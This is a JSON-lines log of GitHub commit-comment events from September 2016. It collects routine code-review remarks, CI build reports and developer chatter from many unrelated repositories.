{"id":"4605263611","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137371,"position":1,"line":1,"path":"src/assets/css/components/app.sss","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:38:09Z","updated_at":"2016-09-22T21:38:09Z","body":"best css file I ever saw"}},"created_at":"2016-09-22T21:38:09Z"}
{"id":"4605264234","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"allisonhall/FEWD-FINAL-PROJECT"},"payload":{"comment":{"id":19137372,"position":22,"line":22,"path":"Final Project/js/main.js","commit_id":"7e1545aa942d821d0f11e01e0bde8ef3634cdaac","created_at":"2016-09-22T21:38:16Z","updated_at":"2016-09-22T21:38:16Z","body":"Very cool to see you changing style based on where the user is at (with regards to scrolling) on the screen!  Instead of using jQuery to add specific styles, how might you move the actual css rules into css classes, and leverage jQuery to toggle whether an element has that css class? "}},"created_at":"2016-09-22T21:38:16Z"}
{"id":"4605266180","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137376,"position":25,"line":25,"path":"package.json","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:38:39Z","updated_at":"2016-09-22T21:38:39Z","body":"Hello, Stan, how is it going? What's up?"}},"created_at":"2016-09-22T21:38:39Z"}
{"id":"4605267233","type":"CommitCommentEvent","actor":{"login":"MatthewSavio"},"repo":{"name":"MatthewSavio/hello-world"},"payload":{"comment":{"id":19137378,"position":null,"line":null,"path":null,"commit_id":"da521909834e7028a1b632748a05df936aed49c4","created_at":"2016-09-22T21:38:50Z","updated_at":"2016-09-22T21:38:50Z","body":"This is my first commit on GitHub.  It took me 2,588 days from the first time I heard about GitHub (August 17th, 2009) and 1,002 days from making an account (December 20th, 2013) to finally making my first commit (September 17th, 2016).  "}},"created_at":"2016-09-22T21:38:50Z"}
{"id":"4605268080","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"allisonhall/FEWD-FINAL-PROJECT"},"payload":{"comment":{"id":19137381,"position":70,"line":70,"path":"Final Project/index.html","commit_id":"7e1545aa942d821d0f11e01e0bde8ef3634cdaac","created_at":"2016-09-22T21:39:02Z","updated_at":"2016-09-22T21:39:02Z","body":"Just a reminder to indent nested elements for readability : ) "}},"created_at":"2016-09-22T21:39:02Z"}
{"id":"4605274508","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137392,"position":28,"line":28,"path":"package.json","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:40:19Z","updated_at":"2016-09-22T21:40:19Z","body":"babel is devDependencies. Convention is that in dependencies you will have the code that will be the part of front-end of the actual app, shipping javascript code. Tools to produce, compile, test, preprocess and etc are in devDeps"}},"created_at":"2016-09-22T21:40:19Z"}
{"id":"4605277783","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137396,"position":35,"line":35,"path":"package.json","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:40:57Z","updated_at":"2016-09-22T21:40:57Z","body":"same with express and webpack, they should be devDependencies, basically only react should be in dependencies here, everything else in devdeps"}},"created_at":"2016-09-22T21:40:57Z"}
{"id":"4605292687","type":"CommitCommentEvent","actor":{"login":"yarl"},"repo":{"name":"hatnote/montage"},"payload":{"comment":{"id":19137428,"position":66,"line":66,"path":"_run_server_test.py","commit_id":"69cb1899b3bd42470a07f801f83b78b9aaf971b1","created_at":"2016-09-22T21:43:58Z","updated_at":"2016-09-22T21:43:58Z","body":"typo: quorum"}},"created_at":"2016-09-22T21:43:58Z"}
{"id":"4605293689","type":"CommitCommentEvent","actor":{"login":"robertogagliotta"},"repo":{"name":"robertogagliotta/openemr"},"payload":{"comment":{"id":19137429,"position":null,"line":null,"path":null,"commit_id":"f239c9e8bf746e8fc3e98cca76d545919b066ce6","created_at":"2016-09-22T21:44:10Z","updated_at":"2016-09-22T21:44:10Z","body":"Hi Brady\r\nUnit testing OK, snomed loaded and Fee sheet search of Quilonia found 6 items."}},"created_at":"2016-09-22T21:44:10Z"}
{"id":"4605293843","type":"CommitCommentEvent","actor":{"login":"cing"},"repo":{"name":"msmbuilder/mdentropy"},"payload":{"comment":{"id":19137431,"position":null,"line":null,"path":null,"commit_id":"63441b15cf91839f7493bd77d824bf1337a4ff1e","created_at":"2016-09-22T21:44:12Z","updated_at":"2016-09-22T21:44:12Z","body":"Here's the same notebook + knn/grassberger with Doane's, for comparison. Is it just that KNN is way better?\r\n\r\n[TestNewMutInf.ipynb.zip](https://github.com/msmbuilder/mdentropy/files/488428/TestNewMutInf.ipynb.zip)\r\n"}},"created_at":"2016-09-22T21:44:12Z"}
{"id":"4605294428","type":"CommitCommentEvent","actor":{"login":"barryloper"},"repo":{"name":"spalger/angularjs-batarang"},"payload":{"comment":{"id":19137435,"position":null,"line":null,"path":null,"commit_id":"971558a6bab1d7d554ebbfb268927fbe4492ec3c","created_at":"2016-09-22T21:44:19Z","updated_at":"2016-09-22T21:44:19Z","body":"@spalger This name/version update hasn't propagated to the Chrome web store. 0.4.3 is still up there saying (Stable)."}},"created_at":"2016-09-22T21:44:19Z"}
{"id":"4605296943","type":"CommitCommentEvent","actor":{"login":"vicfil"},"repo":{"name":"vicfil/09222016"},"payload":{"comment":{"id":19137442,"position":5,"line":1,"path":"js/main.js","commit_id":"4ccf48f3a960d688238049bc840b4f89c02de74e","created_at":"2016-09-22T21:44:49Z","updated_at":"2016-09-22T21:44:49Z","body":"this is a first comment"}},"created_at":"2016-09-22T21:44:49Z"}
{"id":"4605300205","type":"CommitCommentEvent","actor":{"login":"Deadroom"},"repo":{"name":"Deadroom/server"},"payload":{"comment":{"id":19137449,"position":null,"line":null,"path":null,"commit_id":"6b3b201a624f931692bb2c33ff01d2c015d455bf","created_at":"2016-09-22T21:45:28Z","updated_at":"2016-09-22T21:45:28Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar handlers](https://trello.com/c/vMmXhuPM/1-criar-handlers)"}},"created_at":"2016-09-22T21:45:28Z"}
{"id":"4605302693","type":"CommitCommentEvent","actor":{"login":"rishindrareddy"},"repo":{"name":"Akshay2005/cmpe202-project"},"payload":{"comment":{"id":19137460,"position":null,"line":null,"path":null,"commit_id":"24218b0ac12c3f54860416cb5d8b7dbb5a94a066","created_at":"2016-09-22T21:45:58Z","updated_at":"2016-09-22T21:45:58Z","body":"Thank you sunil"}},"created_at":"2016-09-22T21:45:58Z"}
{"id":"4605303116","type":"CommitCommentEvent","actor":{"login":"pedro-mendonca"},"repo":{"name":"WordImpress/WP-Rollback"},"payload":{"comment":{"id":19137461,"position":13,"line":35,"path":"includes/rollback-action.php","commit_id":"c46a4124166fd4d7620f5102494c07323e960dcd","created_at":"2016-09-22T21:46:04Z","updated_at":"2016-09-22T21:46:04Z","body":"**... is a missing proper...**?\r\nor\r\n**... is missing a proper...**?"}},"created_at":"2016-09-22T21:46:04Z"}
{"id":"4605305873","type":"CommitCommentEvent","actor":{"login":"DevinWalker"},"repo":{"name":"WordImpress/WP-Rollback"},"payload":{"comment":{"id":19137470,"position":13,"line":35,"path":"includes/rollback-action.php","commit_id":"c46a4124166fd4d7620f5102494c07323e960dcd","created_at":"2016-09-22T21:46:37Z","updated_at":"2016-09-22T21:46:37Z","body":"is missing a proper\n\nOn Thu, Sep 22, 2016 at 2:46 PM, Pedro Mendonça <notifications@github.com>\nwrote:\n\n> *... is a missing proper...*?\n> or\n> *... is missing a proper...*?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/WordImpress/WP-Rollback/commit/c46a4124166fd4d7620f5102494c07323e960dcd#commitcomment-19137461>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABf7M56rRQtqEEIe87ttclJGuk0oSoYsks5qsvccgaJpZM4KEX6k>\n> .\n>\n\n\n\n-- \n\nDevin Walker\n\nFounder & Lead Developer\n\nP:\n\n858-449-6460 <8584496460>\n\nW:\n\nhttp://wordimpress.com\n\n433 G Street #201\nSan Diego, CA 92101 <https://goo.gl/maps/BePgp>\n<https://www.facebook.com/wordimpressive>  <https://twitter.com/wordimpress>\n  <https://plus.google.com/u/0/b/117062083910623146392/+Wordimpress/about>\n<http://wordimpress.com/>\n"}},"created_at":"2016-09-22T21:46:37Z"}
{"id":"4605311579","type":"CommitCommentEvent","actor":{"login":"AdriVanHoudt"},"repo":{"name":"hapijs/bell"},"payload":{"comment":{"id":19137481,"position":4,"line":108,"path":"lib/index.js","commit_id":"705e1d0a9495dbcfd66df820487cb0a3d1533103","created_at":"2016-09-22T21:47:46Z","updated_at":"2016-09-22T21:47:46Z","body":"I was somehow not watching this repo :P will not miss an issue again ;)\r\nLet me try to put it to Lax tomorrow. I have another cookie that didn't work with Strict but does with Lax."}},"created_at":"2016-09-22T21:47:46Z"}
{"id":"4605317312","type":"CommitCommentEvent","actor":{"login":"paultag"},"repo":{"name":"paultag/dc"},"payload":{"comment":{"id":19137489,"position":null,"line":null,"path":null,"commit_id":"ce869644f1821bcfae27c73aa49fe7cc9c4cab1b","created_at":"2016-09-22T21:48:59Z","updated_at":"2016-09-22T21:48:59Z","body":"Thanks, @beccasjames "}},"created_at":"2016-09-22T21:48:59Z"}
{"id":"4605329957","type":"CommitCommentEvent","actor":{"login":"pedro-mendonca"},"repo":{"name":"WordImpress/WP-Rollback"},"payload":{"comment":{"id":19137522,"position":13,"line":35,"path":"includes/rollback-action.php","commit_id":"c46a4124166fd4d7620f5102494c07323e960dcd","created_at":"2016-09-22T21:51:38Z","updated_at":"2016-09-22T21:51:38Z","body":":D you still didn't spot it, did you?"}},"created_at":"2016-09-22T21:51:38Z"}
{"id":"4605335303","type":"CommitCommentEvent","actor":{"login":"cmarinbe"},"repo":{"name":"MartinoBorsato/HOPdiscussion"},"payload":{"comment":{"id":19137530,"position":null,"line":null,"path":null,"commit_id":"27db49f3a996da2076bccd57b681622849f863d5","created_at":"2016-09-22T21:52:46Z","updated_at":"2016-09-22T21:52:46Z","body":"I'm trying to keep the order too:\r\n\r\n* You are right, if you have to fix the JPsi mass, using DecayTreeFitter makes more sense.\r\n\r\n* We never intended to use the HOP mass for fitting. The idea was that improving its resolution would allow a better signal and background separation.\r\n\r\n* That's a nice use case, we will definitely provide HopMee in the tool.\r\n\r\n* That's true.\r\n\r\n* Yes, and we are thinking about using it for other channels as well!\r\n\r\nSo, I think we agree on the basic implementation now. Let's try to have it in place soon! Thank you very much for your helpful insight! :smile: "}},"created_at":"2016-09-22T21:52:46Z"}
{"id":"4605335529","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":19137532,"position":null,"line":null,"path":null,"commit_id":"e53b2731c4b8b236b15cd51d2c8ed84b1f25bbce","created_at":"2016-09-22T21:52:49Z","updated_at":"2016-09-22T21:52:49Z","body":"Indeed ! Just scheduled another version. \r\n\r\nI once simplified away you PawnCanPush bonus (and it took 98000 games STC and\r\n196000 games LTC)\r\nhttps://groups.google.com/forum/?fromgroups=#!msg/fishcooking_results/1SQ5KRjmYqQ/eu-Axu5_DwAJ;context-place=searchin/fishcooking_results/PawnCanPush%7Csort:relevance\r\n\r\nSo there must have been something good into this idea.\r\nPawns cannot go backward, and should be pushed only if a tangible benefit.\r\nThis should help keep them at home until everything is ready, or compensate for the\r\nstructural bonus they would get if they would push immediately.\r\n\r\nAlso, Mindbreaker remarked a few times that SF needlessly put pieces in front of a backward, \r\nwhich will not be available to at least connect to the next pawn.\r\n\r\nBoth versions submitted still plays e3 in the SF-Chiron position, but might help in other positions.\r\nr1bq1rk1/ppp3pp/2nbpn2/3p1pB1/2PP4/5NP1/PP2PPBP/RN1Q1RK1 w - - 3 8 \r\n"}},"created_at":"2016-09-22T21:52:49Z"}
{"id":"4605335715","type":"CommitCommentEvent","actor":{"login":"mchowdhury"},"repo":{"name":"TamimSha/tamimsha.github.io"},"payload":{"comment":{"id":19137533,"position":14,"line":273,"path":"index.html","commit_id":"39c80b27f8d4380d424a58670e0c99df949e3596","created_at":"2016-09-22T21:52:51Z","updated_at":"2016-09-22T21:52:51Z","body":"The following line should look like this:\r\n <a class=\"mdl-button mdl-js-button mdl-js-ripple-effect\" href=\"\" data-email=\"tamim.sha gmail com\"  class=\"email obfuscated\"> "}},"created_at":"2016-09-22T21:52:51Z"}
{"id":"4605340448","type":"CommitCommentEvent","actor":{"login":"TheCyberBrick"},"repo":{"name":"Angry-Pixel/The-Betweenlands"},"payload":{"comment":{"id":19137543,"position":null,"line":null,"path":null,"commit_id":"36dc854f0d293020324654919f9fd211dd7fa020","created_at":"2016-09-22T21:53:51Z","updated_at":"2016-09-22T21:53:51Z","body":"I have never seen that nether wight texture before, haha"}},"created_at":"2016-09-22T21:53:51Z"}
{"id":"4605342271","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137549,"position":5,"line":5,"path":"dist/index.html","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:54:13Z","updated_at":"2016-09-22T21:54:13Z","body":"`Miracles of a countryside` or `Secrets of summer houses` are more correct translations, not perfect though"}},"created_at":"2016-09-22T21:54:13Z"}
{"id":"4605343175","type":"CommitCommentEvent","actor":{"login":"mchowdhury"},"repo":{"name":"TamimSha/tamimsha.github.io"},"payload":{"comment":{"id":19137554,"position":14,"line":273,"path":"index.html","commit_id":"39c80b27f8d4380d424a58670e0c99df949e3596","created_at":"2016-09-22T21:54:25Z","updated_at":"2016-09-22T21:54:25Z","body":"The following line should look like this: <a class=\"mdl-button mdl-js-button mdl-js-ripple-effect\" href=\"\" data-email=\"tamim.sha gmail com\"  class=\"email obfuscated\"> "}},"created_at":"2016-09-22T21:54:25Z"}
{"id":"4605346747","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137562,"position":10,"line":10,"path":".stylelintrc","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:55:12Z","updated_at":"2016-09-22T21:55:12Z","body":"wow it's a lot of configuration. May be they have some well-maintained common preset, so you will not have this monster herer?"}},"created_at":"2016-09-22T21:55:12Z"}
{"id":"4605347528","type":"CommitCommentEvent","actor":{"login":"mchowdhury"},"repo":{"name":"TamimSha/tamimsha.github.io"},"payload":{"comment":{"id":19137563,"position":14,"line":273,"path":"index.html","commit_id":"39c80b27f8d4380d424a58670e0c99df949e3596","created_at":"2016-09-22T21:55:22Z","updated_at":"2016-09-22T21:55:22Z","body":"The following line should look like this: <a class=\"mdl-button mdl-js-button mdl-js-ripple-effect\" href=\"\" data-email=\"tamim.sha gmail com\"  class=\"email obfuscated\"> "}},"created_at":"2016-09-22T21:55:22Z"}
{"id":"4605349810","type":"CommitCommentEvent","actor":{"login":"mchowdhury"},"repo":{"name":"TamimSha/tamimsha.github.io"},"payload":{"comment":{"id":19137571,"position":14,"line":273,"path":"index.html","commit_id":"39c80b27f8d4380d424a58670e0c99df949e3596","created_at":"2016-09-22T21:55:50Z","updated_at":"2016-09-22T21:55:50Z","body":"The following line should look like this \"<a class=\"mdl-button mdl-js-button mdl-js-ripple-effect\" href=\"\" data-email=\"tamim.sha gmail com\"  class=\"email obfuscated\">\""}},"created_at":"2016-09-22T21:55:50Z"}
{"id":"4605349813","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137572,"position":16,"line":16,"path":".eslintrc","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:55:50Z","updated_at":"2016-09-22T21:55:50Z","body":"you would probably need react plugin and jsx something, don't remember exact packages"}},"created_at":"2016-09-22T21:55:50Z"}
{"id":"4605350423","type":"CommitCommentEvent","actor":{"login":"zeromus"},"repo":{"name":"TASVideos/BizHawk"},"payload":{"comment":{"id":19137574,"position":null,"line":null,"path":null,"commit_id":"1c1c2b7f69bb161360c1168fafe5dc9cc260f84b","created_at":"2016-09-22T21:55:59Z","updated_at":"2016-09-22T21:55:59Z","body":"FYIW, we do things similar to this directly in the gamedb for some other systems. like if there's a 'wram_init_kind' value then you would use that approach to init the work ram. Recently FCEUX had a commit which made several different patterns user-selectable."}},"created_at":"2016-09-22T21:55:59Z"}
{"id":"4605353737","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137580,"position":7,"line":7,"path":".babelrc","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:56:41Z","updated_at":"2016-09-22T21:56:41Z","body":".babelrc is not used generally, it was used in gulp-era, but now if you'll need it in multiple places, it will be javascript so this configuration could be just a js module that is easier to import"}},"created_at":"2016-09-22T21:56:41Z"}
{"id":"4605354039","type":"CommitCommentEvent","actor":{"login":"panicz"},"repo":{"name":"drcz/CONSpiracy-language"},"payload":{"comment":{"id":19137581,"position":null,"line":null,"path":null,"commit_id":"abf404b03bad9c518be203895507650c011716f2","created_at":"2016-09-22T21:56:45Z","updated_at":"2016-09-22T21:56:45Z","body":"Uojezusmaria, ten Pański bind wygląda prawie jak Clojure czy inny Shen. Jeszcze by Pan zmniejszył liczbę nawiasów w lecie (które się właśnie skończyło), np. (let (x 2 y 3) (+ x y)) i to dopiero by było!\r\nA w ogóle to proszę czasem zajrzeć na slaka, bo ja się tam produkuję a Pan pozostaje niewzruszony.\r\nPozdro666\r\nV"}},"created_at":"2016-09-22T21:56:45Z"}
{"id":"4605359218","type":"CommitCommentEvent","actor":{"login":"panicz"},"repo":{"name":"drcz/CONSpiracy-language"},"payload":{"comment":{"id":19137591,"position":null,"line":null,"path":null,"commit_id":"abf404b03bad9c518be203895507650c011716f2","created_at":"2016-09-22T21:57:52Z","updated_at":"2016-09-22T21:57:52Z","body":"(ale Panu napaskudziłem w kosmopolitycznym repozytorium swoją zaściankową polszczyzną!)"}},"created_at":"2016-09-22T21:57:52Z"}
{"id":"4605361485","type":"CommitCommentEvent","actor":{"login":"donggyukim"},"repo":{"name":"ucb-bar/firrtl"},"payload":{"comment":{"id":19137596,"position":null,"line":null,"path":null,"commit_id":"4d4fb3a1c40766028bb89ebdcc5a26bc5b90c428","created_at":"2016-09-22T21:58:20Z","updated_at":"2016-09-22T21:58:20Z","body":"Wow, this is awesome :)"}},"created_at":"2016-09-22T21:58:20Z"}
{"id":"4605361963","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19137601,"position":null,"line":null,"path":null,"commit_id":"a1722b22406de1fc587bc25e5940d4ac10f2089a","created_at":"2016-09-22T21:58:26Z","updated_at":"2016-09-22T21:58:26Z","body":"Sizing-Simple-Chilled-Ceiling (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-22T21:58:26Z"}
{"id":"4605366003","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19137618,"position":null,"line":null,"path":null,"commit_id":"a1722b22406de1fc587bc25e5940d4ac10f2089a","created_at":"2016-09-22T21:59:20Z","updated_at":"2016-09-22T21:59:20Z","body":"Sizing-Simple-Chilled-Ceiling (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T21:59:20Z"}
{"id":"4605366785","type":"CommitCommentEvent","actor":{"login":"donggyukim"},"repo":{"name":"ucb-bar/firrtl"},"payload":{"comment":{"id":19137620,"position":null,"line":null,"path":null,"commit_id":"99e625ca4f572664e0f49abe34273fdb0bca0659","created_at":"2016-09-22T21:59:30Z","updated_at":"2016-09-22T21:59:30Z","body":"@chick Do we need to paren for no argument functions?"}},"created_at":"2016-09-22T21:59:30Z"}
{"id":"4605375345","type":"CommitCommentEvent","actor":{"login":"lsetiawan"},"repo":{"name":"miguelcleon/ODM2-Admin"},"payload":{"comment":{"id":19137636,"position":194,"line":858,"path":"ODM2CZOData/forms.py","commit_id":"2638445dc6af481a83e28ef2b96e9d6ac0792bd4","created_at":"2016-09-22T22:01:14Z","updated_at":"2016-09-22T22:01:14Z","body":"@miguelcleon Great! Thanks for letting me know. Could you possibly make a new branch for testing viewonly functionality? That would be great and I'll make a PR tomorrow early morning to it. Thanks."}},"created_at":"2016-09-22T22:01:14Z"}
{"id":"4605375363","type":"CommitCommentEvent","actor":{"login":"HaNdTriX"},"repo":{"name":"thangngoc89/react-howler"},"payload":{"comment":{"id":19137637,"position":13,"line":13,"path":"src/utils.js","commit_id":"f7e63827542a36af81d2a572eb17db5d355a99c3","created_at":"2016-09-22T22:01:14Z","updated_at":"2016-09-22T22:01:14Z","body":"done in #16 \r\n"}},"created_at":"2016-09-22T22:01:14Z"}
{"id":"4605379015","type":"CommitCommentEvent","actor":{"login":"gfsoileau"},"repo":{"name":"sharms9/dsp"},"payload":{"comment":{"id":19137645,"position":null,"line":null,"path":null,"commit_id":"f903fca1fbd948e3118e6de9fbf65e83e53c48f0","created_at":"2016-09-22T22:02:02Z","updated_at":"2016-09-22T22:02:02Z","body":"RE: 05a-python.md \r\nHello @sharms9\r\ncc: @reshamametis @aramnath \r\n\r\nGreat job in completing the Matrix Linear Algebra section! 👍 \r\nThanks for presenting your work thoroughly and clearly "}},"created_at":"2016-09-22T22:02:02Z"}
{"id":"4605379096","type":"CommitCommentEvent","actor":{"login":"KroArtem"},"repo":{"name":"Andrettin/Wyrmgus"},"payload":{"comment":{"id":19137646,"position":null,"line":null,"path":null,"commit_id":"46a3ad08f55c63a23087ab9f871d6adae91ce114","created_at":"2016-09-22T22:02:03Z","updated_at":"2016-09-22T22:02:03Z","body":"This commit breaks compilation under Linux.\r\n\r\nOutput:\r\n```\r\n[  4%] Building CXX object CMakeFiles/stratagus.dir/src/action/action_attack.cpp.o\r\nIn file included from /home/kroartem/SVN/Wyrmgus/src/action/action_attack.cpp:41:0:\r\n/home/kroartem/SVN/Wyrmgus/src/include/stratagus.h:88:75: error: format string argument is not a string type\r\n #define PRINTF_VAARG_ATTRIBUTE(a, b) __attribute__((format (printf, a, b)))\r\n                                                                           ^\r\n/home/kroartem/SVN/Wyrmgus/src/include/interface.h:418:76: note: in expansion of macro ‘PRINTF_VAARG_ATTRIBUTE’\r\n void SetMessageEvent(const Vec2i &pos, int z, const char *fmt, ...) PRINTF_VAAR\r\n                                                                     ^\r\n/home/kroartem/SVN/Wyrmgus/src/include/stratagus.h:88:75: error: format string argument is not a string type\r\n #define PRINTF_VAARG_ATTRIBUTE(a, b) __attribute__((format (printf, a, b)))\r\n                                                                           ^\r\n/home/kroartem/SVN/Wyrmgus/src/include/player.h:287:77: note: in expansion of macro ‘PRINTF_VAARG_ATTRIBUTE’\r\n tify(int type, const Vec2i &pos, int z, const char *fmt, ...) const PRINTF_VAAR\r\n                                                                     ^\r\n```"}},"created_at":"2016-09-22T22:02:03Z"}
{"id":"4605382919","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19137652,"position":null,"line":null,"path":null,"commit_id":"0699a2fb751f4c687a4b4942812a225142aacb8d","created_at":"2016-09-22T22:02:56Z","updated_at":"2016-09-22T22:02:56Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=81)"}},"created_at":"2016-09-22T22:02:56Z"}
{"id":"4605384557","type":"CommitCommentEvent","actor":{"login":"brettshapiro"},"repo":{"name":"rxa254/LIGO-Controls-Problems"},"payload":{"comment":{"id":19137660,"position":null,"line":null,"path":null,"commit_id":"14b70a46fdedfe209a4d80515a69ec4205d3ac05","created_at":"2016-09-22T22:03:18Z","updated_at":"2016-09-22T22:03:18Z","body":"Here are more details on this seismic noise spectrum, copied from the abstract of the DCC page, T1500318.\r\n\r\n\"Similar to T1500289, spectra form ETMX ISI performance over ER7 lock stretch. All spectra are calibrated in nm/nrad, except the ascii T240 spectra.\r\n\r\nControls configuration: Aggressive level 3 isolation filters, LLO 90mhz blends on St1 X and Z, 45mhz blend on Y, 250mhz blends on RX/RY, 750mhz blend on RZ, St2 250mhz lowpassed blends on X,Y,Z,RZ, rdr .43hz notch sensor correction on St1 X&Y, Mittelman broadband sensor correction on HEPI Z and VL FF on X,Y&Z.\""}},"created_at":"2016-09-22T22:03:18Z"}
{"id":"4605395273","type":"CommitCommentEvent","actor":{"login":"miguelcleon"},"repo":{"name":"miguelcleon/ODM2-Admin"},"payload":{"comment":{"id":19137686,"position":194,"line":858,"path":"ODM2CZOData/forms.py","commit_id":"2638445dc6af481a83e28ef2b96e9d6ac0792bd4","created_at":"2016-09-22T22:05:41Z","updated_at":"2016-09-22T22:05:41Z","body":"Ok, I made a branch called viewonlytest"}},"created_at":"2016-09-22T22:05:41Z"}
{"id":"4605398892","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19137695,"position":null,"line":null,"path":null,"commit_id":"a1722b22406de1fc587bc25e5940d4ac10f2089a","created_at":"2016-09-22T22:06:31Z","updated_at":"2016-09-22T22:06:31Z","body":"Sizing-Simple-Chilled-Ceiling (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2376 of 2379 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T22:06:31Z"}
{"id":"4605400823","type":"CommitCommentEvent","actor":{"login":"rks92"},"repo":{"name":"rks92/LPC"},"payload":{"comment":{"id":19137698,"position":3,"line":2,"path":"app/views/league/eplStandings.html.erb","commit_id":"009f183dbc307a443a6b8e481c1935564db4c567","created_at":"2016-09-22T22:06:56Z","updated_at":"2016-09-22T22:06:56Z","body":"@mbilal94 @zubain Should move the sizing logic outside of this page. So create a wrapper in the parent page. That way you only keep the table dependant styling here and can reuse the same table with different styles"}},"created_at":"2016-09-22T22:06:56Z"}
{"id":"4605404339","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19137712,"position":null,"line":null,"path":null,"commit_id":"e33b55de2cb64f8d8c1df2e476c5067cb2696d5d","created_at":"2016-09-22T22:07:44Z","updated_at":"2016-09-22T22:07:44Z","body":"++"}},"created_at":"2016-09-22T22:07:44Z"}
{"id":"4605406228","type":"CommitCommentEvent","actor":{"login":"rks92"},"repo":{"name":"rks92/LPC"},"payload":{"comment":{"id":19137723,"position":22,"line":6,"path":"app/views/league/userHome.html.erb","commit_id":"009f183dbc307a443a6b8e481c1935564db4c567","created_at":"2016-09-22T22:08:08Z","updated_at":"2016-09-22T22:08:08Z","body":"col-md-x classes don't work on tables. Only spans and divs"}},"created_at":"2016-09-22T22:08:08Z"}
{"id":"4605407939","type":"CommitCommentEvent","actor":{"login":"vishalnayak"},"repo":{"name":"hashicorp/vault"},"payload":{"comment":{"id":19137728,"position":null,"line":null,"path":null,"commit_id":"47771e7da35d24cc6faf8325265386832e97f41c","created_at":"2016-09-22T22:08:32Z","updated_at":"2016-09-22T22:08:32Z","body":"I don't see why an IPv6 address can't be used. This is a good catch again. Fixed now."}},"created_at":"2016-09-22T22:08:32Z"}
